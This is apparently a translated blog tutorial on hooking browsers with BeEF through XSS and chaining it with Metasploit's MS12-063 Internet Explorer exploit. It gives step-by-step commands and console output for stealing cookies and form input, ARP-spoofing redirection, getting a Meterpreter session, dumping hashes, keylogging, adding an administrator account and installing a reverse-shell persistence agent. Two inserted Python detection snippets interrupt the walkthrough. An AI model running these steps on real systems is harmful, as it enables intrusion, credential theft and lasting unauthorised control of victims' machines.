0x01: Background
BeEF is currently the most popular browser attack framework in Europe and the US; its full name is The Browser Exploitation Framework Project. BeEF uses a simple XSS vulnerability to take control of the target host's browser through a prepared piece of JavaScript (hook.js), collects detailed information about the host through that browser, goes on to scan the internal network and, combined with Metasploit, is a real killer for intranet penetration.
Blog: http://blog.beefproject.com/
0x02 Installation
Kali Linux does not ship with BeEF installed; you have to install it yourself.
apt-get update
apt-get install beef-xss
0x03 Getting started
0x03.1 Starting BeEF
Home directory:
/usr/share/beef-xss
cd /usr/share/beef-xss
./beef
127.0.0.1:3000/ui/panel
Username / password:
beef/beef
Demo page: <BeEF-XSS IP>:3000/demos/butcher/index.html
To check that the two hosts can talk to each other:
Visit the BeEF demo page.
The demo page embeds hook.js; whoever visits it gets hooked.
0x04 Planting the hook:
Add a script tag to a legitimate page to embed the malicious script.
In a real penetration test (which needs a public IP), how do we get the victim to visit our page with hook.js embedded?
Website feedback pages and report-abuse pages, for example: "Taking over the Baidu Complaint Center back end with an XSS platform".
Of course, that author used an XSS platform rather than BeEF. With BeEF you would not only get the back-end administrator's cookie; combined with Metasploit, you could also use the administrator's browser as a pivot into the company intranet.
Online Browsers -> right-click -> Use As Proxy
Combine this with ARP spoofing and a MITM attack to redirect every HTTP request on the intranet... (insert a knowing grin here)
The BeEF console detects a host coming online (feels just like the Gray Pigeon and Shangxing days =。= )
Through the browser we can see a lot of information about the target host:
Browser information: name, version, Browser UA String, Browser Platform, window size
Plugin basics: Flash, VBScript, WebSocket, QuickTime ...
API information
Cookies
Operating system information
Date and time
Hardware information: CPU (32/64), screen resolution, touchscreen support
And so on
Tested with Firefox
BeEF function modules
Commonly used functions/modules
Browser: gets browser information
  --Hooked Domain
    -----Get Cookie: gets the client's cookies; run it once and the cookie is shown on the right
    -----Get Form Values: gets the form data submitted on the page, for example bank-card details being typed in, or the username and password on a registration page
    -----Redirect Browser: browser redirection
After execution, every site the target browser visits is redirected to bobao.360.cn. In a real engagement you would run an ARP attack on the intranet and redirect all HTTP traffic to a page with the hook script embedded... (wicked grin here)
Chrome Extensions
Debug: test HTTP requests
Exploits: attack using browser vulnerabilities
Host: gets victim host information
Metasploit: works together with Metasploit for penetration; this is the focus of this article
Network: DoSer, ping, DNS enumeration, port scanning and so on
Social Engineering: social-engineering modules
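A defender's counterpart to the hooking described above, added here as an example (not code from the post or from BeEF): it flags injected hook.js script tags in page HTML and BeEF-looking requests in proxy logs, keyed on the defaults this post relies on (hook.js, /ui/panel, the demo page, the BEEFHOOK/BEEFSESSION cookie names and the 3000/61985/61986 ports from BeEF's config.yaml). The log line format and all sample data are constructed.

```python
"""Defender-side triage for BeEF hook traffic, using the defaults this post relies on: hook.js,
/ui/panel, the demos/butcher page, the BEEFHOOK/BEEFSESSION cookies and ports 3000/61985/61986.
Added example, not code from the post or BeEF. Log format (constructed): "src_ip METHOD url [cookie: a=b; ...]"."""
import re
from urllib.parse import urlsplit

BEEF_PORTS = {3000, 61985, 61986}
BEEF_COOKIES = {"BEEFHOOK", "BEEFSESSION"}
BEEF_PATHS = ("/ui/panel", "/demos/butcher/")
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)

def is_hook_file(url):  # last path component is BeEF's hook file
    return urlsplit(url).path.rsplit("/", 1)[-1].lower() == "hook.js"

def hook_scripts_in_html(html):
    """External <script src> URLs in a page that load hook.js (injection check)."""
    return [src for src in SCRIPT_SRC.findall(html) if is_hook_file(src)]

def classify_request(line):
    """Reasons a log line looks like BeEF traffic; an empty list means clean."""
    parts = line.split(maxsplit=3)
    url, extra = parts[2], (parts[3] if len(parts) == 4 else "")
    u, reasons = urlsplit(url), []
    if is_hook_file(url):
        reasons.append("hook.js fetched")
    elif any(u.path.startswith(p) for p in BEEF_PATHS):
        reasons.append("BeEF UI/demo path " + u.path)
    if u.port in BEEF_PORTS:
        reasons.append("BeEF default port %d" % u.port)
    m = re.search(r"cookie:\s*(.+)", extra, re.I)
    if m:  # cookie names are enough to flag; never record the values
        names = {c.split("=", 1)[0].strip() for c in m.group(1).split(";")}
        reasons.extend("cookie " + n for n in sorted(names & BEEF_COOKIES))
    return reasons

def triage(lines):  # map each client IP to every reason it was flagged
    hits = {}
    for line in lines:
        reasons = classify_request(line)
        if reasons:
            hits.setdefault(line.split()[0], []).extend(reasons)
    return hits

SAMPLE_HTML = '<p>Contact us</p><script src="http://172.16.244.129:3000/hook.js"></script>'  # constructed
SAMPLE_LOG = [  # constructed; 172.16.244.129 is the BeEF host used in the post
    "172.16.244.136 GET http://intranet.local/feedback.html",
    "172.16.244.136 GET http://172.16.244.129:3000/hook.js",
    "172.16.244.136 POST http://172.16.244.129:3000/ cookie: BEEFHOOK=Abc123",
    "172.16.244.140 GET http://172.16.244.129:3000/ui/panel cookie: BEEFSESSION=x1",
]
```

An operator can change every one of these names and ports in config.yaml, so treat a hit as a strong signal and a miss as no signal at all.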
0x05 Working with Metasploit
BeEF configuration file:
/usr/share/beef-xss/config.yaml
metasploit:
    enable: false
Change it to
metasploit:
    enable: true
vim /usr/share/beef-xss/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file
beef:
    version: '0.4.4.5-alpha'
    debug: false

    restrictions:
        # subnet of browser ip addresses that can hook to the framework
        permitted_hooking_subnet: "0.0.0.0/0"
        # subnet of browser ip addresses that can connect to the UI
        # permitted_ui_subnet: "127.0.0.1/32"
        permitted_ui_subnet: "0.0.0.0/0"

    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"
        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
        # It's not advised to decrease it with tons of hooked browsers (more than 50),
        # because it might impact performance. Also, enable WebSockets is generally better.
        xhr_poll_timeout: 5000
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
        # DNS
        dns_host: "localhost"
        dns_port: 53
        panel_path: "/ui/panel"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
            port: 61985 # WS: good success rate through proxies
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        # For information on using other databases please read the
        # README.databases file
        # supported DBs: sqlite, mysql, postgres
        # NOTE: you must change the Gemfile adding a gem require line like:
        # gem "dm-postgres-adapter"
        # or
        # gem "dm-mysql-adapter"
        # if you want to switch drivers from sqlite to postgres (or mysql).
        # Finally, run a 'bundle install' command and start BeEF.
        driver: "sqlite"
        # db_file is only used for sqlite
        db_file: "db/beef.db"
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
        db_encoding: "UTF-8"

    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension
    credentials:
        user: "beef"
        passwd: "beef"

    # Autorun modules as soon the browser is hooked.
    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
    autorun:
        enable: true
        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
        allow_user_notify: true

    crypto_default_value_length: 80

    # Enable client-side debugging
    client:
        debug: false

    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
        metasploit:
            enable: true
        social_engineering:
            enable: true
        evasion:
            enable: false
        console:
            shell:
                enable: false
        ipec:
            enable: true
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "172.16.244.129"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            ssl: false
            ssl_version: 'SSLv3'
            ssl_verify: true
            callback_host: "172.16.244.129"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
              {os: 'osx', path: '/opt/local/msf/'},
              {os: 'livecd', path: '/opt/metasploit-framework/'},
              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
              {os: 'bt5', path: '/opt/framework3/msf3/'},
              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
              {os: 'win', path: 'c:\\metasploit-framework\\'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
Original:
{os: 'custom', path: ''}
Change to
{os: 'custom', path: '/usr/share/metasploit-framework/'}
Change the two parameters host and callback_host to the BeEF host's IP.
Restart the postgresql and metasploit services:
service postgresql restart && service metasploit restart
msfconsole # start Metasploit
load msgrpc ServerHost=172.16.244.129 Pass=abc123
Restart BeEF
Starting BeEF now reports that 246 Metasploit exploits have been loaded; with MSF updated to the latest version there should be five or six hundred.
Enter the BeEF console (where it has inexplicably become 245 =。=!)
use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost 172.16.244.129
exploit    # or: run
The target is forcibly redirected to the URL being listened on.
MSF receives the connection (but it seems the XP installed in the VM has this vulnerability patched, so no session was created).
If XP is unpatched, i.e. it has the vulnerability this exploit targets, a session is created here:
sessions -i 1
screenshot: captures the hooked host's screen to a local file
sysinfo: shows system information
hashdump: dumps the target host's user hashes
0x06 More Meterpreter commands
Reference:
In the previous article, Intranet Penetration 1: Getting into the Intranet through an XSS Vulnerability,
0x01 Filling the gap:
Here I fill in the gap I left in the previous article:
We used the IE exploit exploit/windows/browser/ie_execcommand_uaf, but after running it we found that although the target host was redirected, there was an error:
(Continuing from part one) The target is forcibly redirected to the URL being listened on.
MSF receives the connection
(but it seems the XP installed in the VM had this vulnerability patched, so no session was created).
Afterwards I searched for the cause for a long time and, with guidance from Mickey, finally found the reason for the error:
In msf, enter exploit/windows/browser/ie_execcommand_uaf
0x02 Finding the problem:
Run info to view the exploit's details; it turns out this exploit targets IE7 and IE8 on XP SP3 and Vista, and IE8 and IE9 on Win7.
msf exploit(ie_execcommand_uaf) > info

       Name: MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
     Module: exploit/windows/browser/ie_execcommand_uaf
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  unknown
  eromang
  binjo
  sinn3r <sinn3r@metasploit.com>
  juan vazquez <juan.vazquez@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   IE 7 on Windows XP SP3
  2   IE 8 on Windows XP SP3
  3   IE 7 on Windows Vista
  4   IE 8 on Windows Vista
  5   IE 8 on Windows 7
  6   IE 9 on Windows 7

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  OBFUSCATE   false            no        Enable JavaScript obfuscation
  SRVHOST     172.16.244.129   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits a vulnerability found in Microsoft Internet
  Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object
  gets deleted in an unexpected manner, but the same memory is reused
  again later in the CMshtmlEd::Exec() function, leading to a
  use-after-free condition. Please note that this vulnerability has
  been exploited in the wild since Sep 14 2012. Also note that
  presently, this module has some target dependencies for the ROP
  chain to be valid. For WinXP SP3 with IE8, msvcrt must be present
  (as it is by default). For Vista or Win7 with IE8, or Win7 with IE9,
  JRE 1.6.x or below must be installed (which is often the case).

References:
  http://cvedetails.com/cve/2012-4969/
  http://www.osvdb.org/85532
  http://www.microsoft.com/technet/security/bulletin/MS12-063.mspx
  http://technet.microsoft.com/en-us/security/advisory/2757760
  http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
  http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/
So I quietly went and downloaded XP SP3 and installed IE7 (a freshly installed XP SP3 comes with IE6).
(Installed, rebooted, repeated the steps from part one... many words omitted)
0x03 EXP successful:
Finally, it returned successful!
sessions:
sessions -i 1
sysinfo
ipconfig
ps
hashdump
...
0x04 Common commands:
Screenshot:
screenshot
Keylogging:
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against SPRITEKI-674621
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20150315141552_default_172.16.244.136_host.windows.key_879494.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
Run cmd:
meterpreter > shell
Add a user:
net user name password /add
Add the user to the administrators group:
net localgroup administrators name /add
Since this is an intranet, there is not much point in opening 3389 anyway.
Kill AV
meterpreter > run scraper
[*] New session on 172.16.244.136:1114...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: Access is denied.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\FQvPwGSl.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\HFQhdyFt.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iNNrwzBu.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\QBVFVWVP.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Vwvxmugh.reg)
[*]  Cleaning HKU
[*] Completed processing on 172.16.244.136:1114...
Persistence
meterpreter > run persistence -X -i 20 3376 -r 172.16.244.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/SPRITEKI-674621_20150315.5511/SPRITEKI-674621_20150315.5511.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.244.129 LPORT=4444
[*] Persistent agent script is 609466 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lBsbPnkcYJvv.vbs
[+] Agent executed with PID 1112
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ShFzEOxwbuI
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
exploit
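The flip side of the persistence step above, as an added example that is not from the post or from Metasploit: a parser for an exported .reg copy of the Run key that flags values launching a script from a Temp directory, which is exactly what the output above shows being installed (value ShFzEOxwbuI pointing at a .vbs under LOCALS~1\Temp). The sample .reg text is constructed; it reuses only the value name and path printed above.

```python
r"""Spot the autorun entry the persistence script above leaves behind: a value under
HKLM\...\CurrentVersion\Run whose data launches a script file from a Temp directory.
Added example, not code from the post or from Metasploit; the .reg text is constructed
to mimic a `reg export` of the Run key, reusing the value name and path printed above."""
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
TEMP_DIR = re.compile(r"\\Temp\\", re.I)  # matches ...\LOCALS~1\Temp\ and ...\Local\Temp\
SCRIPT_EXT = (".vbs", ".js", ".wsf", ".bat", ".ps1")

def parse_run_values(reg_text):
    """Return {value_name: data} for the Run key of an exported .reg file (REG_SZ values)."""
    values, in_key = {}, False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line.strip("[]").lower() == RUN_KEY.lower()
        elif in_key and line.startswith('"'):
            name, _, data = line.partition("=")
            # REG_SZ data is quoted; undo .reg escaping: \\ -> \ and \" -> "
            data = data.strip()[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            values[name.strip('"')] = data
    return values

def suspicious_autoruns(reg_text):
    """(name, data) pairs whose command runs a script file out of a Temp directory."""
    flagged = []
    for name, data in parse_run_values(reg_text).items():
        if TEMP_DIR.search(data) and any(ext in data.lower() for ext in SCRIPT_EXT):
            flagged.append((name, data))
    return flagged

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareUser.exe\""
"Sync"="cscript.exe C:\\Tools\\sync.vbs"
"ShFzEOxwbuI"="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\lBsbPnkcYJvv.vbs"
'''
```

The cleanup .rc file the script writes on the attacker side is the quickest confirmation in a lab; on a real host, the Run value plus the .vbs in Temp is what an incident responder will find.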
Using the Windows API from meterpreter, with a Hello World message box as the example:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")
0x05 More Meterpreter commands
Reference:
0x06 Thanks
Thanks to the all-capable Mickey and to Xuan (玄魂)
2015-03-19
Original article: